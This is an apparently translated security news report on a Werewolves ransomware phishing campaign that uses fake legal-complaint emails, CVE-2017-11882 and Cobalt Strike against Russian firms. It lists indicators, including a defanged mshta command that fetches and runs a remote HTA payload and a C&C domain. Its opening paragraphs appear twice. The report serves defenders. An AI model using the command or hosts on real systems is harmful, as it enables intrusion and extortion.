Industry, IT and Finance under the gun: F. A. C. C. T. warns of a new ransomware campaign.
Cybersecurity experts from the company F. A. C. C. T. Threat Intelligence recorded a new wave of malicious mailings from the well-known hacker group Werewolves. This time, the attackers targeted Russian industrial enterprises, telecommunications and IT companies, as well as financial and insurance organizations.
According to experts, the extortionists created a fake website of a major Russian manufacturer of special equipment, copying the contents of the original portal using the HTTrack Website Copier program. The cybercriminals then sent out emails with the topics "Pre-trial Claim" and "Complaint", containing malicious attachments that download the Cobalt Strike Beacon.
The attack was carried out as follows:
A distinctive feature of the group is the use of double-pressure techniques: in addition to extortion for decrypting data, they publish information about those who refused to pay the ransom on their website.
In April of this year, extortionists have already conducted mass mailings on the topics of the spring draft and pre-trial claims.
Cybersecurity experts from the company F. A. C. C. T. Threat Intelligence recorded a new wave of malicious mailings from the well-known hacker group Werewolves. This time, the attackers targeted Russian industrial enterprises, telecommunications and IT companies, as well as financial and insurance organizations.
According to experts, the extortionists created a fake website of a major Russian manufacturer of special equipment, copying the contents of the original portal using the HTTrack Website Copier program. The cybercriminals then sent out emails with the topics "Pre-trial Claim" and "Complaint", containing malicious attachments that download the Cobalt Strike Beacon.
The attack was carried out as follows:
- The victim opens the attached document "Complaint.doc" (SHA256: da9e7da207a17076785dbe28d6c7922e81d07e84529f80e7a38265c5316fc8d2), which loads an RTF document that exploits the CVE-2017-11882 vulnerability.
- HTA (HTML Application) is loaded on the device: mshta https://iplis [.] en / laydowngrenade.jpeg -> hxxp://vlasta-s[.]ru/logista.hta.
- The HTA file executes a PowerShell command that unpacks and runs the Cobalt Strike Stager shellcode.
- Stager loads the Cobalt Strike Beacon, whose configuration contains watermark: 987654321 and C&C: poopy [.] aarkhipov [.] en.
A distinctive feature of the group is the use of double-pressure techniques: in addition to extortion for decrypting data, they publish information about those who refused to pay the ransom on their website.
In April of this year, extortionists have already conducted mass mailings on the topics of the spring draft and pre-trial claims.
